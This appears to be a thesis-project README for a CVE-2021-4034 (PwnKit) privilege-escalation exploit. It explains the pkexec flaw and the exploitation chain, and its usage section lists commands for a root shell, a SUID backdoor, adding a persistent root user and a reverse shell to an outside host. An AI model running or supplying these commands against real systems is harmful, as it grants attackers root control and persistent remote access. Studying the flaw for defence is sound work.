Share
## https://sploitus.com/exploit?id=1C20613C-057B-59D1-ABFE-7A1D0ADF6198
# CVE-2021-4034 β€” PwnKit Local Privilege Escalation Β· Master's Thesis Research

[![Platform](https://img.shields.io/badge/Platform-Linux-blue)](https://nvd.nist.gov/vuln/detail/CVE-2021-4034)
[![Language](https://img.shields.io/badge/Language-Python%20%2F%20C-informational)](https://github.com/devianntsec)
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE)
[![Research](https://img.shields.io/badge/Research-Master's%20Thesis-purple)](https://github.com/devianntsec)
[![CVSS](https://img.shields.io/badge/CVSS-7.8%20(High)-orange)](https://nvd.nist.gov/vuln/detail/CVE-2021-4034)

> **Memory corruption vulnerability in polkit's pkexec utility**  
> Local Privilege Escalation β†’ root via out-of-bounds write  
> Affected: polkit 0.105-31 and earlier Β· Patch: polkit 0.105-33 (January 2022)

---


   
  
  Interactive root shell obtained via CVE-2021-4034 - PwnKit


## Description

This repository contains my **Master's Thesis research** on **CVE-2021-4034**, a High-severity (CVSS 7.8) **Local Privilege Escalation** vulnerability in polkit's `pkexec` utility, commonly known as **PwnKit**.

The vulnerability originates from an **out-of-bounds write** in `pkexec`'s argument processing logic. When `pkexec` is executed with an empty or crafted `argv`, it reads and writes beyond the bounds of the `argv` array into the `envp` array, allowing an unprivileged local user to inject malicious environment variables that are subsequently loaded as a shared library, executing arbitrary code with root privileges.

### My Contribution

| Aspect | Description |
|--------|-------------|
| **Multi-payload exploit** | Python wrapper with 6 payload modes including shell, id, backdoor, and reverse shell |
| **Automated environment setup** | Automatic GCONV_PATH construction and gconv-modules configuration |
| **Post-exploitation modules** | SUID backdoor, root user creation, and custom command execution |
| **Academic documentation** | Root cause analysis, exploitation chain, and vulnerability timeline |

---

## Repository Structure

```
CVE-2021-4034-PwnKit-Masters-Thesis/
β”œβ”€β”€ README.md                        # This file
β”œβ”€β”€ LICENSE                          # MIT License
β”‚
β”œβ”€β”€ exploit/
β”‚   └── pwnkit.py                    # Advanced exploit with multiple payloads
β”‚
└── docs/
    β”œβ”€β”€ screenshots/                 # Exploitation demonstrations
    β”‚   β”œβ”€β”€ 01-pwnkit-shell.png
    β”‚   β”œβ”€β”€ 02-pwnkit-id.png
    β”‚   β”œβ”€β”€ 03-pwnkit-whoami.png
    β”‚   β”œβ”€β”€ 04-pwnkit-backdoor.png
    β”‚   β”œβ”€β”€ 05-pwnkit-add-user.png
    β”‚   β”œβ”€β”€ 06-pwnkit-reverse.png
    β”‚   └── 07-pwnkit-custom.png
    β”‚
    └── analysis/
        β”œβ”€β”€ 01-root-cause.md         # Vulnerability root cause analysis
        β”œβ”€β”€ 02-exploitation-chain.md # Exploitation chain breakdown
        └── 03-timeline.md           # CVE timeline
```

---

## Quick Start

### Prerequisites

- Linux system with vulnerable polkit (`pkexec --version` shows 0.105 or earlier)
- GCC compiler (`apt install gcc`)
- Python 3.6+
- Standard user account (no root required)
- Isolated VM recommended for testing

### Usage

```bash
# Interactive root shell (default)
python3 exploit/pwnkit.py -p shell

# Verify execution context
python3 exploit/pwnkit.py -p whoami

# Execute custom command as root
python3 exploit/pwnkit.py -p custom -c "id"

# Create SUID backdoor at /tmp/.sh
python3 exploit/pwnkit.py -p backdoor_suid

# Add persistent root user
python3 exploit/pwnkit.py -p add_root_user --username backdoor --password mypassword

# Reverse shell
python3 exploit/pwnkit.py -p reverse_shell --lhost 192.168.1.10 --lport 4444
```

### Payload Reference

| Payload | Description | Output |
|---------|-------------|--------|
| `shell` | Spawns interactive `/bin/sh` as root | Interactive shell |
| `id` | Writes `id` and `whoami` output to `/tmp/pwnkit_id.txt` | File |
| `whoami` | Writes UID/eUID verification to `/tmp/pwnkit_root_test` | File |
| `backdoor_suid` | Creates SUID root bash copy at `/tmp/.sh` | Persistent backdoor |
| `add_root_user` | Appends custom user to `/etc/passwd` | Persistent access |
| `reverse_shell` | Connects back to attacker via Python | Remote shell |
| `custom` | Executes any command as root | Stdout / file |

---

## Technical Overview

### Vulnerability Root Cause

`pkexec` processes its own `argv` to locate the program being run. When invoked with `argc == 0` (empty argument vector), the bounds check on `argv` fails silently. The subsequent out-of-bounds read treats `envp[0]` as `argv[1]`, and the out-of-bounds write back into `envp` allows an attacker to replace an environment variable with a crafted path. When `pkexec` later calls `g_printerr()`, it loads `GCONV_PATH` from the now-attacker-controlled environment, loading an attacker-supplied shared library with root privileges.

```
argc == 0  β†’  argv[1] reads envp[0]
             argv[1] = "GCONV_PATH=."  (writes back into envp)
             pkexec loads ./pwnkit.so  (attacker-controlled shared library)
             gconv_init() executes as root
```

### Exploitation Chain

```
1. Craft argv = { NULL }  β†’  argc = 0, triggers OOB access
2. Set envp[0] = "pwnkit.so:."
3. Set envp[1] = "PATH=GCONV_PATH=."
4. pkexec OOB-writes "pwnkit.so:." into envp[0] as if it were argv[1]
5. pkexec resolves GCONV_PATH=. and loads gconv-modules
6. gconv-modules maps "PWNKIT" charset to pwnkit.so
7. pwnkit.so:gconv_init() called with root privileges
8. Payload executes (shell / backdoor / reverse shell / etc.)
```

### Key Technical Details

| Component | Value | Notes |
|-----------|-------|-------|
| Vulnerable binary | `/usr/bin/pkexec` | SUID root |
| Trigger condition | `argc == 0` | Empty argv |
| Write primitive | OOB write into `envp` | Via `argv[argc-1]` |
| Load mechanism | `GCONV_PATH` + `gconv-modules` | Standard glibc iconv |
| Execution context | `gconv_init()` in shared library | Runs as EUID 0 |
| Affected versions | polkit ≀ 0.105-31 | All major Linux distros |

---

## Demonstrations

### Interactive Root Shell
![Interactive Shell](docs/screenshots/01-pwnkit-shell.png)

### ID Verification
![ID Payload](docs/screenshots/02-pwnkit-id.png)

### Whoami Verification
![Whoami Payload](docs/screenshots/03-pwnkit-whoami.png)

### SUID Backdoor
![Backdoor Payload](docs/screenshots/04-pwnkit-backdoor.png)

### Add Root User
![Add Root User](docs/screenshots/05-pwnkit-add-user.png)

### Reverse Shell
![Reverse Shell](docs/screenshots/06-pwnkit-reverse.png)

### Custom Command
![Custom Payload](docs/screenshots/07-pwnkit-custom.png)

---

## Empirical Testing

All testing was conducted on an isolated VirtualBox VM running Ubuntu 20.04 LTS with polkit 0.105-26 (vulnerable), with no network exposure.

| Payload | Result | Notes |
|---------|--------|-------|
| `shell` | βœ… Root shell obtained | Immediate interactive access |
| `id` | βœ… `uid=0(root)` confirmed | Output in `/tmp/pwnkit_id.txt` |
| `whoami` | βœ… `root` confirmed | UID/eUID = 0 |
| `backdoor_suid` | βœ… SUID bit set on `/tmp/.sh` | Persistent after exploit |
| `add_root_user` | βœ… Custom user created | Survives reboot |
| `reverse_shell` | βœ… Connection established | Python reverse shell working |
| `custom` | βœ… Arbitrary command execution | Full root context |

---

## Technical Documentation

| Document | Description |
|----------|-------------|
| [Root Cause Analysis](docs/analysis/01-root-cause.md) | Out-of-bounds write in pkexec argument processing |
| [Exploitation Chain](docs/analysis/02-exploitation-chain.md) | Step-by-step breakdown of the GCONV_PATH injection |
| [CVE Timeline](docs/analysis/03-timeline.md) | Discovery, disclosure, and patch chronology |

---

## Academic Context

This research is part of my **Master's Thesis in Cybersecurity** (UCAM β€” Campus Internacional de Ciberseguridad), analyzing N-Day vulnerabilities across multiple environments.

This CVE represents the **Linux local privilege escalation** vector within the thesis, demonstrating:
- Memory safety vulnerabilities in SUID binaries
- Out-of-bounds write exploitation via environment variable manipulation
- Shared library injection via glibc's iconv infrastructure
- Multi-payload post-exploitation framework design

**Keywords:** `LPE` Β· `Polkit` Β· `pkexec` Β· `SUID` Β· `GCONV_PATH` Β· `CVE-2021-4034` Β· `PwnKit`

---

## Author

**Annais Molina (devianntsec)** β€” Master's Student in Cybersecurity

[![GitHub](https://img.shields.io/badge/GitHub-@devianntsec-181717?style=flat-square&logo=github)](https://github.com/devianntsec)
[![LinkedIn](https://img.shields.io/badge/LinkedIn-Annais%20Molina-0077B5?style=flat-square&logo=linkedin)](https://linkedin.com/in/annais-molina-fuentes)
[![Email](https://img.shields.io/badge/Email-me%40deviannt.com-D14836?style=flat-square&logo=gmail)](mailto:me@deviannt.com)

---

## Acknowledgments

- [**Qualys Research Team**](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) β€” Original discovery and responsible disclosure
- [**arthepsy**](https://github.com/arthepsy/CVE-2021-4034) β€” Early proof-of-concept reference
- [**berdav**](https://github.com/berdav/CVE-2021-4034) β€” Public PoC reference implementation

---

## License

MIT License β€” see [LICENSE](LICENSE)

---

## Legal Disclaimer

This repository is provided **for educational and security research purposes only**, as part of an academic Master's Thesis. All testing was performed on isolated virtual machines with no network exposure. Use only on systems you own or have explicit written authorization to test. Unauthorized use against systems is illegal and may result in criminal prosecution.


  Β© 2026 Annais Molina Β· Master's Thesis in Cybersecurity
  UCAM Universidad CatΓ³lica San Antonio de Murcia Β· Campus Internacional de Ciberseguridad